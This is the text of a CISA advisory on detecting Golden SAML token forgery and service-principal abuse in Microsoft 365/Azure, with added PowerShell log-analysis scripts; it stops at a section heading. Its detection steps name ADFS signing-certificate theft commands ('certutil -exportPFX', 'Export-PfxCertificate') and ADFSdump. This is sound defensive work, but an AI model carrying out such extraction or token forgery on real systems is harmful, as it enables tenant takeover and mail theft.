US CERT: Technical Security Alerts

Alerts warn about vulnerabilities, incidents, and other security issues that pose a significant risk.
January 8, 2021

AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments

Original release date: January 8, 2021
Summary

This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

This Alert is a companion alert to AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations. AA20-352A primarily focuses on an advanced persistent threat (APT) actor’s compromise of SolarWinds Orion products as an initial access vector into networks of U.S. Government agencies, critical infrastructure entities, and private network organizations. As noted in AA20-352A, the Cybersecurity and Infrastructure Security Agency (CISA) has evidence of initial access vectors in addition to the compromised SolarWinds Orion products.

This Alert also addresses activity—irrespective of the initial access vector leveraged—that CISA attributes to an APT actor. Specifically, CISA has seen an APT actor using compromised applications in a victim’s Microsoft 365 (M365)/Azure environment. CISA has also seen this APT actor utilizing additional credentials and Application Programming Interface (API) access to cloud resources of private and public sector organizations. These tactics, techniques, and procedures (TTPs) feature three key components:

  • Compromising or bypassing federated identity solutions;
  • Using forged authentication tokens to move laterally to Microsoft cloud environments; and
  • Using privileged access to a victim’s cloud environment to establish difficult-to-detect persistence mechanisms for Application Programming Interface (API)-based access.

This Alert describes these TTPs and offers an overview of, and guidance on, available open-source tools—including a CISA-developed tool, Sparrow—for network defenders to analyze their Microsoft Azure Active Directory (AD), Office 365 (O365), and M365 environments to detect potentially malicious activity.

Note: this Alert describes artifacts—presented by these attacks—from which CISA has identified detectable evidence of the threat actor’s initial objectives. CISA continues to analyze the threat actor’s follow-on objectives.

Technical Details

Frequently, CISA has observed the APT actor gaining Initial Access [TA0001] to victims’ enterprise networks via compromised SolarWinds Orion products (e.g., Solorigate, Supernova).[1] However, CISA is investigating instances in which the threat actor may have obtained initial access by Password Guessing [T1110.001], Password Spraying [T1110.003], and/or exploiting inappropriately secured administrative or service credentials (Unsecured Credentials [T1552]) instead of utilizing the compromised SolarWinds Orion products.

CISA observed this threat actor moving from user context to administrator rights for Privilege Escalation [TA0004] within a compromised network and using native Windows tools and techniques, such as Windows Management Instrumentation (WMI), to enumerate the Microsoft Active Directory Federation Services (ADFS) token-signing capability. With the ADFS token-signing certificate and key, the threat actor can forge SAML authentication tokens that present claims to service providers, without those claims being checked against the identity provider, and then move laterally to Microsoft cloud environments (Lateral Movement [TA0008]). This is the Golden SAML technique described under Stage 1 below.

The threat actor has also used on-premises access to manipulate and bypass identity controls and multi-factor authentication. This activity demonstrates how sophisticated adversaries can use credentials from one portion of an organization to move laterally (Lateral Movement [TA0008]) through trust boundaries, evade defenses and detection (Defense Evasion [TA0005]), and steal sensitive data (Collection [TA0009]).

This level of compromise is challenging to remediate and requires a rigorous multi-disciplinary effort to regain administrative control before recovering.

Mitigations

Detection

Guidance on identifying affected SolarWinds software is well documented.[2] However—once an organization identifies a compromise via SolarWinds Orion products or other threat actor TTPs—identifying follow-on activity for on-premises networks requires fine-tuned network and host-based forensics.

The nature of cloud forensics is unique due to the growing and rapidly evolving technology footprints of major vendors. Microsoft's O365 and M365 environments have built-in capabilities for detecting unusual activity. Microsoft also provides premium services (Advanced Threat Protection [ATP] and Azure Sentinel), which enable network defenders to investigate TTPs specific to the Solorigate activity.[3]

Detection Tools

CISA is providing examples of detection tools for informational purposes only. CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services does not constitute or imply their endorsement, recommendation, or favoring by CISA.

There are a number of open-source tools available to investigate adversary activity in Microsoft cloud environments and to detect unusual activity, service principals, and application activity.[4] Publicly available PowerShell tools that network defenders can use to investigate M365 and Microsoft Azure include:

  • CISA's Sparrow,
  • Open-source utility Hawk, and
  • CrowdStrike's Azure Reporting Tool (CRT).

Additionally, Microsoft's Office 365 Management API and Graph API provide an open interface for ingesting telemetry and evaluating service configurations for signs of anomalous activity and intrusion.

Note: these open-source tools are highlighted and explained to assist with on-site investigation and remediation in cloud environments but are not all-encompassing. Open source tools can be complemented by services such as Azure Sentinel, a Microsoft premium service that provides comprehensive analysis tools, including custom detections for the activity indicated.

General Guidance on Using Detection Tools
  1. Audit the creation and use of service principal credentials. Look for unusual application usage, such as use of dormant applications.
  2. Audit the assignment of credentials to applications that allow non-interactive sign-in by the application. Look for unexpected trust relationships added to the Azure Active Directory.
  3. Download the interactive sign-ins from the Azure admin portal or use the Microsoft Sentinel product. Review new token validation time periods with high values and investigate whether it was a legitimate change or an attempt to gain persistence by a threat actor.
Sparrow

CISA created Sparrow to help network defenders detect possible compromised accounts and applications in the Azure/M365 environment. The tool focuses on the narrow scope of user and application activity endemic to identity- and authentication-based attacks seen recently in multiple sectors. It is neither comprehensive nor exhaustive of available data. It is intended to narrow a larger set of available investigation modules and telemetry to those specific to recent attacks on federated identity sources and applications.

CISA advises Sparrow users to take the following actions.

  1. Use Sparrow to detect any recent domain authentication or federation modifications.
    1. Domain and federation modification operations are uncommon and should be investigated.
  2. Examine logs for new and modified credentials applied to applications and service principals, distinguishing by credential type (password/secret versus certificate). Sparrow can be used to detect the modification of service principals and application credentials.
    1. Create a timeline for all credential changes, focusing on recent wholesale changes.
    2. Review the “top actors” for activity in the environment and the number of credential modifications performed.
    3. Monitor changes in application and service principal credentials.
    4. Investigate any instances of excessive permissions being granted, including, but not limited to, Exchange Online, Microsoft Graph, and Azure AD Graph.
  3. Use Sparrow to detect privilege escalation, such as adding a service principal, user, or group to a privileged role.
  4. Use Sparrow to detect OAuth consent and users’ consent to applications, which is useful for interpreting changes in adversary TTPs.
  5. Use Sparrow to identify anomalous Security Assertion Markup Language (SAML) token sign-ins by pivoting on the unified audit log UserAuthenticationMethod value of 16457, which indicates how the SAML token was built and is a potential indicator of a forged SAML token.
    1. Note that this TTP has not been the subject of significant published security research but may indicate an unusual usage of a token, such as guest access for external partners to M365 resources.
  6. Review the PowerShell logs that Sparrow exports.
    1. Review PowerShell mailbox sign-ins and validate that the logins are legitimate actions.
    2. Review PowerShell usage for users with PowerShell in the environment.
  7. Use Sparrow to check the Graph API application permissions of all service principals and applications in M365/Azure AD.
    1. Investigate unusual activity regarding Microsoft Graph API permissions (using either the legacy https://graph.windows.net/ or https://graph.microsoft.com). Graph is used frequently as part of these TTPs, often to access and manipulate mailbox resources.
  8. Review Sparrow’s listed tenant’s Azure AD domains, to see if the domains have been modified.
  9. For customers with G5 or E5 licensing levels, review MailItemsAccessed for insight into what application identification (ID) was used for accessing users’ mailboxes. Use Sparrow to query for a specific application ID using the app id investigation capability, which will check to see if it is accessing mail or file items.
    1. The MailItemsAccessed event provides auditability for mailbox data accessed via mail protocols or clients.
    2. By analyzing the MailItemsAccessed action, incident responders can determine which user mailbox items have been accessed and potentially exfiltrated by a threat actor. This event will be recorded even in some situations where the message was not necessarily read interactively (e.g., bind or sync).[5]
    3. The resulting suspicious application ID can provide incident responders with a pivot to detect other suspicious applications that require additional analysis.
    4. Check for changes to applications with regards to the accessing of resources such as mail or file items.
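The general guidance and Sparrow checklists above, implemented as an added example (this is not code from the CISA alert or from the Sparrow tool): a minimal pass over Unified Audit Log records that classifies the federation, credential, role and consent operations listed above and flags UserLoggedIn records whose UserAuthenticationMethod is 16457. The records embedded below are constructed sample data; the tenant name, UPNs, object IDs and IP addresses are hypothetical, and the operation lists are a starting point rather than Sparrow's complete set.

```powershell
# Added example, not code from the CISA alert or from Sparrow. In a live tenant
# the records come from Exchange Online PowerShell, e.g.
#   Search-UnifiedAuditLog -StartDate (Get-Date).AddDays(-90) -EndDate (Get-Date) `
#       -ResultSize 5000 -SessionCommand ReturnLargeSet
# and each result's AuditData property is the JSON consumed below.
# Constructed sample data: tenant, UPNs, object IDs and IPs are hypothetical.
$sampleAuditData = @(
    '{"CreationTime":"2020-12-14T03:12:09","Operation":"Set federation settings on domain.","UserId":"admin@contoso.example","Target":[{"Type":1,"ID":"contoso.example"}]}'
    '{"CreationTime":"2020-12-14T03:40:51","Operation":"Add service principal credentials.","UserId":"admin@contoso.example","Target":[{"Type":2,"ID":"ServicePrincipal_1f3c0c2e"}]}'
    '{"CreationTime":"2020-12-14T03:42:07","Operation":"Add member to role.","UserId":"admin@contoso.example","Target":[{"Type":2,"ID":"ServicePrincipal_1f3c0c2e"},{"Type":1,"ID":"Company Administrator"}]}'
    '{"CreationTime":"2020-12-14T11:05:00","Operation":"Update user.","UserId":"helpdesk@contoso.example","Target":[{"Type":1,"ID":"alice@contoso.example"}]}'
    '{"CreationTime":"2020-12-15T01:02:03","Operation":"UserLoggedIn","UserId":"cfo@contoso.example","ClientIP":"203.0.113.7","ExtendedProperties":[{"Name":"UserAuthenticationMethod","Value":"16457"},{"Name":"RequestType","Value":"Login:login"}]}'
    '{"CreationTime":"2020-12-15T08:15:44","Operation":"UserLoggedIn","UserId":"alice@contoso.example","ClientIP":"198.51.100.20","ExtendedProperties":[{"Name":"UserAuthenticationMethod","Value":"1"},{"Name":"RequestType","Value":"Login:login"}]}'
)

# Azure AD operation names as written to the UAL, grouped by the checks above.
# Patterns are matched with -like; extend the lists from your own tenant's data.
$OperationCategories = [ordered]@{
    DomainFederation = @('Set domain authentication.', 'Set federation settings on domain.', 'Set DirSyncEnabled flag.')
    CredentialChange = @('Add service principal credentials.', 'Remove service principal credentials.', 'Update application*Certificates and secrets*')
    PrivilegedRole   = @('Add member to role.', 'Add app role assignment*')
    Consent          = @('Consent to application.', 'Add delegated permission grant.')
}

function Get-UalFinding {
    param([Parameter(Mandatory)][string[]]$AuditData)
    foreach ($json in $AuditData) {
        $r = $json | ConvertFrom-Json
        $category = $null
        foreach ($name in $OperationCategories.Keys) {
            foreach ($pattern in $OperationCategories[$name]) {
                if ($r.Operation -like $pattern) { $category = $name }
            }
        }
        # Forged-SAML indicator from the Sparrow list: a UserLoggedIn record whose
        # UserAuthenticationMethod extended property is 16457.
        if (-not $category -and $r.Operation -eq 'UserLoggedIn') {
            $method = ($r.ExtendedProperties | Where-Object Name -eq 'UserAuthenticationMethod').Value
            if ("$method" -eq '16457') { $category = 'SamlAuthMethod16457' }
        }
        if (-not $category) { continue }    # routine operation, not a finding
        [pscustomobject]@{
            Time      = [datetime]$r.CreationTime
            Category  = $category
            Operation = $r.Operation
            Actor     = $r.UserId
            Target    = @($r.Target | ForEach-Object { $_.ID }) -join ';'
            ClientIP  = $r.ClientIP
        }
    }
}

$findings = Get-UalFinding -AuditData $sampleAuditData | Sort-Object Time
$findings | Format-Table Time, Category, Operation, Actor, Target, ClientIP -AutoSize

# "Top actors": who performed the most federation and credential changes in the window
$findings | Where-Object { $_.Category -in 'DomainFederation', 'CredentialChange' } |
    Group-Object Actor | Sort-Object Count -Descending |
    Select-Object Count, Name | Format-Table -AutoSize
```

To run it against a real tenant, pipe `(Search-UnifiedAuditLog ...).AuditData` into `Get-UalFinding`. Keep an inventory of the accounts that legitimately change federation and application credentials so the top-actor list can be read at a glance, and treat any DomainFederation finding as investigate-first, since those operations are rare in normal administration.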
Hawk

Hawk is an open-source, PowerShell-driven, community-developed tool network defenders can use to quickly and easily gather data from O365 and Azure for security investigations. Incident responders and network defenders can investigate specific user principals or the entire tenant. Data it provides include IP addresses and sign-in data. Additionally, Hawk can track IP usage for concurrent login situations.

Hawk users should review login details for administrator accounts and take the following steps.

  1. Investigate high-value administrative accounts to detect anomalous or unusual activity (Global Admins).
  2. Enable PowerShell logging, and evaluate PowerShell activity in the environment not used for traditional or expected purposes.
    1. PowerShell logging does not reveal the exact cmdlet that was run on the tenant.
  3. Look for users with unusual sign-in locations, dates, and times.
  4. Check permissions of service principals and applications in M365/Azure AD.
  5. Detect the frequency of resource access from unusual places. Use the tool to pivot to a trusted application and see if it is accessing mail or file items.
  6. Review mailbox rules and recent mailbox rule changes.
CrowdStrike Azure Reporting Tool

CrowdStrike's Azure Reporting Tool (CRT) helps network defenders analyze permissions and service configuration in their Azure AD tenant and M365 environment. This tool has minor overlap with Sparrow: it reports unique items and does not cover the same areas. CISA is highlighting this tool because it is one of the only free, open-source tools available to investigate this activity and can be used to complement Sparrow.

Detection Tool Distinctions
  • Sparrow differs from CRT by looking for specific indicators of compromise associated with the recent attacks.
  • CRT focuses on the tenant’s Azure AD permissions and Exchange Online configuration settings instead of the unified audit log, which gives it a different output from Sparrow or Hawk.
  • CRT returns the same broad scope of application/delegated permissions for service principals and applications as Hawk.
  • As part of its investigation, Sparrow homes in on a narrow set of application permissions given to the Graph API, which is common to the recent attacks.
  • CRT looks at Exchange Online federation configuration and federation trust, while Sparrow focuses on listing Azure AD domains.
  • Among the items network defenders can use CRT to review are delegated permissions and application permissions, federation configurations, federation trusts, mail forwarding rules, service principals, and objects with KeyCredentials.
Detection Methods

Microsoft breaks the threat actor’s recent activity into four primary stages, which are described below along with associated detection methods. Microsoft describes these stages as beginning with all activity after the compromise of the on-premises identity solution, such as ADFS.[6]

Note: this stage provides an entry vector to cloud environments, and is unnecessary when the threat actor has compromised an identity solution or credential that allows the APT direct access to the cloud (e.g., without leveraging the SolarWinds Orion vulnerability).

Stage 1: Forging a trusted authentication token used to access resources that trust the on-premises identity provider

These attacks (often referred to as “Golden Security Assertion Markup Language” attacks) can be analyzed using a combination of cloud-based and standard on-premises techniques.[7] For example, network defenders can use OAuth claims for specific principals made at the Azure AD level and compare them to the on-premises identity.

Export sign-in logs from the Azure AD portal and look at the Authentication Method field.

Note: at portal.azure.com, click on a user and review the authentication details (e.g., date, method, result). Without Sentinel, this is the only way to get these logs, which are critical for this effort.

Detection Method 1: Correlating service provider login events with corresponding authentication events in Active Directory Federation Services (ADFS) and Domain Controllers

Using SAML single sign-on, search for any logins to service providers that do not have corresponding events in the domain: Event ID 4769 (a Kerberos service ticket was requested) on the domain controllers, and Event IDs 1200 (the Federation Service issued a valid token) and 1202 (the Federation Service validated a new credential) on the ADFS servers.

Detection Method 2: Identifying certificate export events in ADFS

Look for:

  1. The IP address and Activity_ID in EventCode 410 and the Activity_ID and Instance_ID in EventCode 500.
  2. Export-PfxCertificate or certutil -exportPFX in PowerShell Event IDs 4103 (module logging) and 4104 (script block logging), which may reveal a certificate extraction technique.
  3. Deleted certificate extraction with ADFSdump performed using Sysmon Event ID 18 with the pipe name \microsoft##wid\tsql\query (exclude processes regularly making this pipe connection on the machine).
  4. Event ID 307 (The Federation Service configuration was changed), which can be correlated to relevant Event ID 510 with the same instance ID for change details (Event ID 510 with the same Instance ID could be more than one event per single Event ID 307 event).

Detection Method 3: Customizing SAML response to identify irregular access

This method serves as prevention for the future (and would only detect future, not past, activity), as it helps identify irregularities from the point of the change forward. Organizations can modify SAML responses to include custom elements for each service provider to monitor and detect any anomalous requests.[8]

Detection Method 4: Detecting malicious ADFS trust modification

A threat actor who gains administrative access to ADFS can add a new, trusted ADFS rather than extracting the certificate and private key as part of a standard Golden SAML attack.[9]
Network defenders should look for:

  1. Event ID 307 (The Federation Service configuration was changed), which can be correlated to relevant Event ID 510 with the same Instance ID for change details. (Event ID 510 with the same Instance ID could be more than one event per single Event ID 307 event.)
    1. Review events, particularly searching for Configuration: Type: IssuanceAuthority where Property Value references an unfamiliar domain.
  2. Interrogation of the ADFS host using the ADFS PowerShell cmdlets. Look for changes in the federation trust environment that would indicate new ADFS sources.
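Detection Methods 1 and 4 above as an added example (not part of the CISA alert): federated cloud sign-ins with no ADFS token issuance behind them, and Event ID 307 joined to its Event ID 510 details by Instance ID to extract the IssuanceAuthority value. The sign-in rows stand in for the Azure AD sign-in log export and the ADFS rows for Get-WinEvent output after the Instance ID and message text have been pulled out of each event; names, domains, times, Instance IDs and the issuer URL are hypothetical.

```powershell
# Added example, not part of the CISA alert. On the ADFS server the real sources are:
#   Get-WinEvent -FilterHashtable @{LogName='AD FS/Admin'; Id=307,510}
#   Get-WinEvent -FilterHashtable @{LogName='Security'; ProviderName='AD FS Auditing'; Id=1200,1202}
# The objects below are constructed stand-ins for those events and for the
# Azure AD sign-in export; all names, times and identifiers are hypothetical.
$cloudSignIns = @(
    [pscustomobject]@{ Time = [datetime]'2020-12-14T08:00:05'; User = 'alice@contoso.example'; AuthMethod = 'Federated'; App = 'Office 365 Exchange Online' }
    [pscustomobject]@{ Time = [datetime]'2020-12-14T09:30:00'; User = 'cfo@contoso.example';   AuthMethod = 'Federated'; App = 'Office 365 Exchange Online' }
)

$adfsEvents = @(
    # 1200: the Federation Service issued a valid token; the message names the user
    [pscustomobject]@{ Id = 1200; Time = [datetime]'2020-12-14T07:59:58'; InstanceId = $null;      Message = 'The Federation Service issued a valid token. UserId: alice@contoso.example' }
    # 307 + 510 sharing an Instance ID: the configuration change and its details
    [pscustomobject]@{ Id = 307;  Time = [datetime]'2020-12-13T23:41:10'; InstanceId = 'c0ffee01'; Message = 'The Federation Service configuration was changed.' }
    [pscustomobject]@{ Id = 510;  Time = [datetime]'2020-12-13T23:41:10'; InstanceId = 'c0ffee01'; Message = 'Configuration: Type: IssuanceAuthority Property Name: Authority Property Value: http://sts.unknown-partner.example/adfs/services/trust' }
)

function Find-SignInWithoutAdfsToken {
    # Detection Method 1: a federated sign-in that ADFS never issued a token for
    # (no 1200/1202 naming that user within the window) is a Golden SAML candidate.
    param($SignIns, $AdfsEvents, [int]$WindowMinutes = 5)
    foreach ($s in ($SignIns | Where-Object AuthMethod -eq 'Federated')) {
        $backing = $AdfsEvents | Where-Object {
            ($_.Id -in 1200, 1202) -and
            ($_.Message -match [regex]::Escape($s.User)) -and
            ([math]::Abs(($_.Time - $s.Time).TotalMinutes) -le $WindowMinutes)
        }
        if (-not $backing) { $s }
    }
}

function Find-FederationConfigChange {
    # Detection Method 4: join each 307 to its 510 detail events by Instance ID and
    # extract the IssuanceAuthority value; anything outside $KnownIssuers is suspect.
    param($AdfsEvents, [string[]]$KnownIssuers)
    $details = @{}
    foreach ($d in ($AdfsEvents | Where-Object Id -eq 510)) { $details[$d.InstanceId] += @($d) }
    foreach ($e in ($AdfsEvents | Where-Object Id -eq 307)) {
        foreach ($d in $details[$e.InstanceId]) {
            if ($d.Message -match 'Type:\s*IssuanceAuthority.*Property Value:\s*(\S+)') {
                $issuer = $Matches[1]
                [pscustomobject]@{
                    Time       = $e.Time
                    InstanceId = $e.InstanceId
                    Issuer     = $issuer
                    Known      = [bool]($KnownIssuers | Where-Object { $issuer -like "*$_*" })
                }
            }
        }
    }
}

Find-SignInWithoutAdfsToken -SignIns $cloudSignIns -AdfsEvents $adfsEvents |
    Format-Table Time, User, App -AutoSize

Find-FederationConfigChange -AdfsEvents $adfsEvents -KnownIssuers 'sts.contoso.example' |
    Format-Table Time, InstanceId, Issuer, Known -AutoSize
```

The correlation window in `Find-SignInWithoutAdfsToken` has to absorb clock skew between the ADFS farm and the cloud export, and the user match is a substring search on the message, so parse the UPN out of the event XML instead when the real events are available. A 307/510 pair whose issuer is not in the known list is exactly the "new, trusted ADFS" case described above and should be escalated even if the change looks administrative.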

Stage 2: Using the forged authentication token to create configuration changes in the Service Provider, such as AzureAD (establishing a foothold)

After the threat actor has compromised the on-premises identity provider, they identify their next series of objectives by reviewing activity in the Microsoft Cloud activity space (Microsoft Azure and M365 tenants).

The threat actor uses the ability to forge authentication tokens to establish a presence in the cloud environment. The actor adds additional credentials to an existing service principal. Once the threat actor has impersonated a privileged AzureAD account, they are likely to further manipulate the Azure/M365 environment (action on objectives in the cloud).

Network defenders should take the following steps.

  1. Audit the creation and use of service principal and application credentials. Sparrow will detect modifications to these credentials.
    1. Look for unusual application usage, such as dormant or forgotten applications being used again.
    2. Audit the assignment of credentials to applications that allow non-interactive sign-in by the application.
  2. Look for unexpected trust relationships that have been added to Azure AD. (Download the last 30 days of non-interactive sign-ins from the Azure portal or use Azure Sentinel.)[10]
  3. Use Hawk (and any sub-modules available) to run an investigation on a specific user. Hawk will provide IP addresses, sign-in data, and other data. Hawk can also track IP usage in concurrent login situations.
  4. Review login details for administrator accounts (e.g., high-value administrative accounts, such as Global Admins). Look for unusual sign-in locations, dates, and times.
  5. Review new token validation time periods with high values and investigate whether the changes are legitimate or a threat actor’s attempts to gain persistence.

Stage 3: Acquiring an OAuth access token for the application using the forged credentials added to an existing application or service principal and calling APIs with the permissions assigned to that application

In some cases, the threat actor has been observed adding permissions to existing applications or service principals. Additionally, the actor has been seen establishing new applications or service principals briefly and using them to add permissions to the existing applications or service principals, possibly to add a layer of indirection (e.g., using the new principal to add a credential to another service principal, and then deleting it).[11]

Network defenders should use Sparrow to:

  1. Examine highly privileged accounts; specifically using sign-in logs, look for unusual sign-in locations, dates, and times.
  2. Create a timeline for all credential changes.
  3. Monitor changes in application credentials (the script will export into csv named AppUpdate_Operations_Export).
  4. Detect service principal credentials change and service principal change (e.g., if an actor adds new permissions or expands existing permissions).
    1. Export and view this activity via the ServicePrincipal_Operations_Export.
  5. Record OAuth consent and consent to applications
    1. Export and view this record via the Consent_Operations_Export file.
  6. Investigate instances of excessive high permissions, including, but not limited to Exchange Online, Microsoft Graph, and Azure AD Graph.
    1. Review Microsoft Graph API permissions granted to service principals.
    2. Export and view this activity via the ApplicationGraphPermissions csv file.
      1. Note: Hawk can also return the full list of service principal permissions for further investigation.
    3. Review top actors and the amount of credential modifications performed.
    4. Monitor changes in application credentials.
  7. Identify manipulation of custom or third-party applications.
    1. Network defenders should review the catalog of custom or third-party vendors with applications in the Microsoft tenant and perform the above interrogation principles on those applications and trusts.
  8. Review modifications to federation trust settings.
    1. Review new token validation time periods with high values and investigate whether this was a legitimate change or an attempt to gain persistence by the threat actor.
      1. The script detects the escalation of privileges, including the addition of Service Principals (SP) to privileged roles. Export this data into csv called AppRoleAssignment_Operations_Export.
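The layer-of-indirection pattern from the Stage 3 description above (a service principal created, used to add credentials or permissions to another principal, then deleted), as an added example that is not part of the CISA alert or of Sparrow. Input is the AuditData JSON from Search-UnifiedAuditLog, as in the Sparrow exports; the records are constructed. The assumption that a service principal acting on its own behalf appears in UserId under the same ServicePrincipal_<id> string that its creation event carries in Target is the example's own, so confirm it against a known-good record in your tenant before relying on the join.

```powershell
# Added example, not part of the CISA alert or of Sparrow. Constructed UAL
# records: an admin creates ServicePrincipal_aaaa1111, which adds a credential
# and an app role to the existing ServicePrincipal_bbbb2222, and is removed 21
# minutes later; ServicePrincipal_cccc3333 is a long-lived principal for contrast.
# All identifiers and UPNs are hypothetical.
$stage3Records = @(
    '{"CreationTime":"2020-11-02T14:00:00","Operation":"Add service principal.","UserId":"devops@contoso.example","Target":[{"Type":2,"ID":"ServicePrincipal_cccc3333"}]}'
    '{"CreationTime":"2020-12-16T10:00:00","Operation":"Add service principal.","UserId":"admin@contoso.example","Target":[{"Type":2,"ID":"ServicePrincipal_aaaa1111"}]}'
    '{"CreationTime":"2020-12-16T10:05:12","Operation":"Add service principal credentials.","UserId":"ServicePrincipal_aaaa1111","Target":[{"Type":2,"ID":"ServicePrincipal_bbbb2222"}]}'
    '{"CreationTime":"2020-12-16T10:07:40","Operation":"Add app role assignment to service principal.","UserId":"ServicePrincipal_aaaa1111","Target":[{"Type":2,"ID":"ServicePrincipal_bbbb2222"},{"Type":1,"ID":"Mail.Read"}]}'
    '{"CreationTime":"2020-12-16T10:21:03","Operation":"Remove service principal.","UserId":"admin@contoso.example","Target":[{"Type":2,"ID":"ServicePrincipal_aaaa1111"}]}'
)

function Find-ShortLivedServicePrincipal {
    param([Parameter(Mandatory)][string[]]$AuditData, [int]$MaxLifetimeHours = 24)
    $records = $AuditData | ForEach-Object { $_ | ConvertFrom-Json } |
        Sort-Object { [datetime]$_.CreationTime }
    $created = @{}    # service principal ID -> the record that created it
    foreach ($r in $records) {
        $targets = @($r.Target | ForEach-Object { $_.ID })
        if ($r.Operation -eq 'Add service principal.') {
            foreach ($t in $targets) { $created[$t] = $r }
        }
        elseif ($r.Operation -eq 'Remove service principal.') {
            foreach ($t in $targets) {
                if (-not $created.ContainsKey($t)) { continue }   # created before the window
                $c        = $created[$t]
                $lifetime = [datetime]$r.CreationTime - [datetime]$c.CreationTime
                if ($lifetime.TotalHours -gt $MaxLifetimeHours) { continue }
                # Everything the short-lived principal did between creation and removal
                $actions = $records | Where-Object {
                    $_.UserId -eq $t -and
                    [datetime]$_.CreationTime -ge [datetime]$c.CreationTime -and
                    [datetime]$_.CreationTime -le [datetime]$r.CreationTime
                }
                [pscustomobject]@{
                    ServicePrincipal = $t
                    CreatedBy        = $c.UserId
                    Created          = [datetime]$c.CreationTime
                    Lifetime         = $lifetime
                    ActionsTaken     = @(foreach ($a in $actions) {
                        '{0} -> {1}' -f $a.Operation, (@($a.Target | ForEach-Object { $_.ID }) -join ';')
                    })
                }
            }
        }
    }
}

Find-ShortLivedServicePrincipal -AuditData $stage3Records | Format-List
```

Each finding names the principal that was created and removed, who created it, and what it changed in between; the target principals in ActionsTaken are the ones to carry into the credential-change timeline and the Graph permission review above. The 24-hour default is a starting point: legitimate automation also creates and deletes principals, so tune the window against a month of known-good data rather than lowering it until the noise disappears.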

Stage 4: Once access has been established, the threat actor uses the Microsoft Graph API to conduct actions on objectives from an external RESTful API (queries impersonating existing applications)

Network defenders should:

  1. In MailItemsAccessed operations, found within the Unified Audit Log (UAL), review the application ID used (requires a G5 or E5 license for this specific detail).
  2. Query the specific application ID, using the Sparrow script’s app ID investigation capability, to interrogate mail and file items accessed by that application ID. (Use the application ID utility for any other suspicious apps that require additional analysis.)
  3. Check the permissions of an application in M365/AzureAD using Sparrow.
    1. Hawk will return Azure_Application_Audit, and Sparrow will return ApplicationGraphPermissions.
    2. Network defenders will see the IP address that Graph API uses.
    3. Note: a Microsoft-owned IP address may appear instead of the threat actor’s virtual private server or anonymized endpoint.
  4. Use Hawk to investigate a specific service principal or user account. This activity is challenging to see without Azure Sentinel or manually downloading and reviewing logs from the sign-in portal.
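The Stage 4 pivot on MailItemsAccessed, as an added example that is not part of the CISA alert: it groups advanced-audit MailItemsAccessed records by the application that performed the access and flags application IDs missing from the tenant's known list, so that an unknown app reading several mailboxes by Sync or Bind stands out. The records are constructed; the app IDs, mailboxes and IPs are hypothetical, and the known-app list is a placeholder for one built from the tenant's application inventory.

```powershell
# Added example, not part of the CISA alert. In a live tenant (E5/G5 advanced
# auditing) the input is
#   (Search-UnifiedAuditLog -Operations MailItemsAccessed -StartDate ... -EndDate ...).AuditData
# The records below are constructed; app IDs, mailboxes and IPs are hypothetical.
# Field names (MailboxOwnerUPN, ClientAppId, ClientIPAddress, OperationProperties
# with MailAccessType, Folders/FolderItems) follow the MailItemsAccessed event schema.
$mailRecords = @(
    '{"CreationTime":"2020-12-17T02:10:00","Operation":"MailItemsAccessed","MailboxOwnerUPN":"cfo@contoso.example","ClientAppId":"99999999-9999-9999-9999-999999999999","ClientIPAddress":"203.0.113.7","OperationProperties":[{"Name":"MailAccessType","Value":"Sync"},{"Name":"IsThrottled","Value":"False"}],"Folders":[{"Path":"\\Inbox","FolderItems":[{"InternetMessageId":"<m1@contoso.example>"},{"InternetMessageId":"<m2@contoso.example>"}]}]}'
    '{"CreationTime":"2020-12-17T02:12:30","Operation":"MailItemsAccessed","MailboxOwnerUPN":"ciso@contoso.example","ClientAppId":"99999999-9999-9999-9999-999999999999","ClientIPAddress":"203.0.113.7","OperationProperties":[{"Name":"MailAccessType","Value":"Sync"},{"Name":"IsThrottled","Value":"False"}],"Folders":[{"Path":"\\Inbox","FolderItems":[{"InternetMessageId":"<m3@contoso.example>"}]}]}'
    '{"CreationTime":"2020-12-17T09:00:00","Operation":"MailItemsAccessed","MailboxOwnerUPN":"alice@contoso.example","ClientAppId":"11111111-1111-1111-1111-111111111111","ClientIPAddress":"198.51.100.20","OperationProperties":[{"Name":"MailAccessType","Value":"Bind"},{"Name":"IsThrottled","Value":"False"}],"Folders":[{"Path":"\\Inbox","FolderItems":[{"InternetMessageId":"<m4@contoso.example>"}]}]}'
)

# Application IDs the tenant expects to see reading mail (hypothetical here; in
# practice build this from the app inventory, e.g. Get-AzureADServicePrincipal).
$knownMailApps = @('11111111-1111-1111-1111-111111111111')

function Get-MailAccessByApp {
    param([Parameter(Mandatory)][string[]]$AuditData, [string[]]$KnownAppIds = @())
    $AuditData | ForEach-Object { $_ | ConvertFrom-Json } |
        Where-Object Operation -eq 'MailItemsAccessed' |
        Group-Object ClientAppId | ForEach-Object {
            $g = $_
            $items = 0
            foreach ($r in $g.Group) {
                foreach ($f in $r.Folders) { if ($f.FolderItems) { $items += @($f.FolderItems).Count } }
            }
            [pscustomobject]@{
                AppId      = $g.Name
                Known      = $g.Name -in $KnownAppIds
                Mailboxes  = @($g.Group | ForEach-Object { $_.MailboxOwnerUPN } | Sort-Object -Unique)
                AccessType = @($g.Group | ForEach-Object { ($_.OperationProperties | Where-Object Name -eq 'MailAccessType').Value } | Sort-Object -Unique)
                ClientIPs  = @($g.Group | ForEach-Object { $_.ClientIPAddress } | Sort-Object -Unique)
                Items      = $items
                First      = ($g.Group | ForEach-Object { [datetime]$_.CreationTime } | Sort-Object)[0]
            }
        }
}

# Unknown applications (Known = False) sort first; those app IDs are the ones to
# feed into Sparrow's app ID investigation and the credential-change timeline.
Get-MailAccessByApp -AuditData $mailRecords -KnownAppIds $knownMailApps |
    Sort-Object Known |
    Format-Table AppId, Known, Items, AccessType, ClientIPs, Mailboxes -AutoSize
```

Sync access by an application that is not in the inventory, across more than one mailbox from a single source address, is the shape of the Graph-based collection described in this stage. Note that a Bind or Sync record counts items the client fetched, not items a person read, so the Items column is an upper bound on what may have been exfiltrated rather than proof that it was.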
Microsoft Telemetry Nuances

